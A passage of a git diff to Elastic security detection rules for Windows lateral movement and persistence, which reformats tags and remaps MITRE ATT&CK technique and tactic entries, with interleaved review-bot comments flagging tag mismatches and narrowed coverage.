+reference = "https://attack.mitre.org/techniques/T1087/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" + + + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/windows/lateral_movement_powershell_remoting_target.toml b/rules/windows/lateral_movement_powershell_remoting_target.toml index c3800a224ff..39f0f961dc7 100644 --- a/rules/windows/lateral_movement_powershell_remoting_target.toml +++ b/rules/windows/lateral_movement_powershell_remoting_target.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -68,7 +68,17 @@ references = [ risk_score = 47 rule_id = "2772264c-6fb9-4d9d-9014-b416eed21254" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -82,18 +92,36 @@ sequence by host.id with maxspan = 30s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.006" name = "Windows Remote Management" reference = "https://attack.mitre.org/techniques/T1021/006/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/lateral_movement_rdp_enabled_registry.toml b/rules/windows/lateral_movement_rdp_enabled_registry.toml index f3703e06da7..76936f15511 100644 
--- a/rules/windows/lateral_movement_rdp_enabled_registry.toml +++ b/rules/windows/lateral_movement_rdp_enabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -102,31 +102,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml index 72f7f70f5c2..197d4339c52 100644 --- a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml +++ b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/11" [rule] author = ["Elastic"] @@ -90,13 +90,19 @@ process where host.os.type == "windows" and event.type == "start" and user.id != [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_remote_service_installed_winlog.toml b/rules/windows/lateral_movement_remote_service_installed_winlog.toml index c460493bac4..374035f3dfd 100644 --- a/rules/windows/lateral_movement_remote_service_installed_winlog.toml +++ b/rules/windows/lateral_movement_remote_service_installed_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] 
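Review bot: In the threat hunk `T1570` Lateral Tool Transfer is replaced by `T1021.002` SMB/Windows Admin Shares rather than kept alongside it; for a rule about copying files to a hidden admin share, `T1570` describes the copy itself and `T1021.002` only the channel, and `lateral_movement_executable_tool_transfer_smb.toml` in this same patch lists both under Lateral Movement. Keep the `T1570` `[[rule.threat.technique]]` block in addition to the new `T1021` one unless the intent is to deliberately narrow coverage, in which case the commit message should say so.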
@@ -101,36 +101,31 @@ sequence by winlog.logon.id, winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/lateral_movement_remote_services.toml b/rules/windows/lateral_movement_remote_services.toml index b7e54f55c06..6409bf739d8 100644 --- a/rules/windows/lateral_movement_remote_services.toml +++ b/rules/windows/lateral_movement_remote_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] 
@@ -107,7 +107,15 @@ references = [ risk_score = 47 rule_id = "aa9a274d-6b53-424d-ac5e-cb8ca4251650" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", +] type = "eql" query = ''' @@ -153,31 +161,14 @@ sequence with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_remote_task_creation_winlog.toml b/rules/windows/lateral_movement_remote_task_creation_winlog.toml index fd0ce3a7261..43c46a6440b 100644 --- a/rules/windows/lateral_movement_remote_task_creation_winlog.toml +++ b/rules/windows/lateral_movement_remote_task_creation_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] 
@@ -44,7 +44,14 @@ note = """## Triage and analysis risk_score = 47 rule_id = "9c865691-5599-447a-bac9-b3f2df5f9a9d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -56,49 +63,31 @@ iam where host.os.type == "windows" and event.action == "scheduled-task-created" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + 
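Review bot: Both `"Tactic: Execution"` and `"Tactic: Persistence"` are removed from `tags`, but the threat hunk below keeps `T1053.005` and re-labels its tactic from `TA0003` Persistence to `TA0002` Execution, so the rule still maps to Execution without a matching tag and `Tactic: Execution` will likely be reported as missing. Re-add `"Tactic: Execution",` after `"Tactic: Lateral Movement",`. Switching the scheduled-task entry from Persistence to Execution is itself a judgment call, since ATT&CK lists T1053 under both; if a remotely created task is also meant to be read as persistence, keep a second entry rather than silently changing the tactic.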
diff --git a/rules/windows/lateral_movement_scheduled_task_target.toml b/rules/windows/lateral_movement_scheduled_task_target.toml index 9f0d96a262a..53d7fe1e840 100644 --- a/rules/windows/lateral_movement_scheduled_task_target.toml +++ b/rules/windows/lateral_movement_scheduled_task_target.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] author = ["Elastic"] @@ -50,7 +50,16 @@ references = ["https://www.elastic.co/security-labs/hunting-for-lateral-movement risk_score = 47 rule_id = "954ee7c8-5437-49ae-b2d6-2960883898e9" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", +] type = "eql" query = ''' 
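Review bot: `"Tactic: Execution"` is dropped from `tags`, but this file's threat hunk in the next section keeps `T1053.005` under `TA0002` Execution as unchanged context, so the tags no longer cover every tactic in the threat mapping and `Tactic: Execution` will likely be reported as missing. Either restore `"Tactic: Execution",` after `"Tactic: Lateral Movement",` or remove the Execution `[[rule.threat]]` entry; the patch does neither.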
@@ -68,31 +77,31 @@ sequence by host.id, process.entity_id with maxspan = 1m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_unusual_dns_service_children.toml b/rules/windows/lateral_movement_unusual_dns_service_children.toml index ff217f183a0..f9f1e18e1ff 100644 --- a/rules/windows/lateral_movement_unusual_dns_service_children.toml +++ b/rules/windows/lateral_movement_unusual_dns_service_children.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] 
@@ -77,7 +77,21 @@ references = [ risk_score = 73 rule_id = "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -97,26 +111,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml index a07a9bf1cf7..d7b316d6ed2 100644 --- a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml 
+++ b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/06" [rule] author = ["Elastic"] @@ -54,7 +54,17 @@ references = [ risk_score = 47 rule_id = "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -67,16 +77,18 @@ event.category : "file" and host.os.type : "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + + [rule.new_terms] field = "new_terms_fields" value = ["file.path", "host.id"] diff --git a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml index 0c2fd0e28c6..a74ff41d148 100644 --- a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml +++ b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -63,7 +63,18 @@ references = [ risk_score = 73 rule_id = "25224a80-5a4a-4b8a-991e-6ab390465c4f" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
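Review bot: `"Tactic: Persistence"` is dropped from the tags of lateral_movement_via_startup_folder_rdp_smb.toml, but the threat hunk on the next line (`@@ -80,46 +91,36 @@`) keeps the second `[[rule.threat]]` block mapping T1547.001 to `TA0003` Persistence as unchanged context. With the tag gone and the tactic still present, the `Tactic:` tag/threat cross-check this series introduces would report a missing `Tactic: Persistence` tag for this rule. Either keep the tag, `"Tactic: Persistence",` after `"Tactic: Lateral Movement",`, or remove the Persistence threat entry, whichever matches the intended mapping.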
@@ -80,46 +91,36 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/lateral_movement_via_wsus_update.toml b/rules/windows/lateral_movement_via_wsus_update.toml index 7737d941df9..22ecd3dc5c9 100644 --- a/rules/windows/lateral_movement_via_wsus_update.toml +++ b/rules/windows/lateral_movement_via_wsus_update.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/19" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
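Review bot: Removing the `T1021.002` (SMB/Windows Admin Shares) subtechnique and the `T1570` (Lateral Tool Transfer) technique from lateral_movement_via_startup_folder_rdp_smb.toml narrows the ATT&CK coverage the rule advertises to RDP only. The file name and the prior mapping suggest SMB is one of the two delivery paths this rule covers, and the query is outside this hunk, so please confirm the narrowing is intended. If SMB writes are still detected, restore `[[rule.threat.technique.subtechnique]]` / `id = "T1021.002"` / `name = "SMB/Windows Admin Shares"` under T1021.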
@@ -63,7 +63,20 @@ references = ["https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authe risk_score = 47 rule_id = "8e2485b6-a74f-411b-bf7f-38b819f3a846" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -79,26 +92,14 @@ process.executable : ( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1072" -name = "Software Deployment Tools" -reference = "https://attack.mitre.org/techniques/T1072/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1072" -name = "Software Deployment Tools" -reference = "https://attack.mitre.org/techniques/T1072/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/persistence_ad_adminsdholder.toml b/rules/windows/persistence_ad_adminsdholder.toml index 7cc39bbcbf0..3c87f58aebf 100644 --- a/rules/windows/persistence_ad_adminsdholder.toml 
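Review bot: Replacing `T1072` (Software Deployment Tools) with `T1210` (Exploitation of Remote Services) in the threat hunk of lateral_movement_via_wsus_update.toml changes the meaning of the mapping. Abuse of a WSUS update channel is a deployment-infrastructure technique rather than exploitation of a vulnerable remote service, so the previous T1072 mapping appears to be the closer fit; the removal of the duplicate Execution block together with the `"Tactic: Execution"` tag is consistent and fine. Suggest keeping `id = "T1072"` / `name = "Software Deployment Tools"` / `reference = "https://attack.mitre.org/techniques/T1072/"` in the remaining block, or recording why T1210 was chosen.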
+++ b/rules/windows/persistence_ad_adminsdholder.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/31" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -60,7 +60,16 @@ references = [ risk_score = 73 rule_id = "6e9130a5-9be6-48e5-943a-9628bfc74b18" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -71,26 +80,24 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.ObjectDN:CN=Adm [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/windows/persistence_adobe_hijack_persistence.toml b/rules/windows/persistence_adobe_hijack_persistence.toml index 92b99f7fa50..06021e79ce1 100644 --- a/rules/windows/persistence_adobe_hijack_persistence.toml +++ b/rules/windows/persistence_adobe_hijack_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [transform] [[transform.osquery]] @@ -131,13 +131,24 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.010" +name = "Services File Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/010/" + + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_app_compat_shim.toml b/rules/windows/persistence_app_compat_shim.toml index 6927c5276c6..c99c0974df7 100644 --- a/rules/windows/persistence_app_compat_shim.toml +++ b/rules/windows/persistence_app_compat_shim.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
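Review bot: Blank-line spacing inside the `[[rule.threat]]` tables of persistence_adobe_hijack_persistence.toml is inconsistent after the `@@ -131,13 +131,24 @@` hunk: the blank between `framework` and the first `[[rule.threat.technique]]` is removed, no blank separates `T1554` from the added `T1574` technique, yet three blank lines are inserted before `[rule.threat.tactic]`. Other threat hunks in this chunk insert one or two blanks at the same spot (the dns_service_file_writes, appcertdlls and scheduled_task_scripting hunks, among others), so the series does not follow one layout. If the repository's TOML normaliser rewrites this on the next pass it is harmless; otherwise a single blank line between tables, matching the surrounding files, would be the expected style.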
@@ -61,7 +61,19 @@ Application Compatibility Shim databases are used in Windows to ensure older app risk_score = 47 rule_id = "c5ce48a6-7f57-4ee8-9313-3d0024caee10" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -87,36 +99,19 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.011" -name = 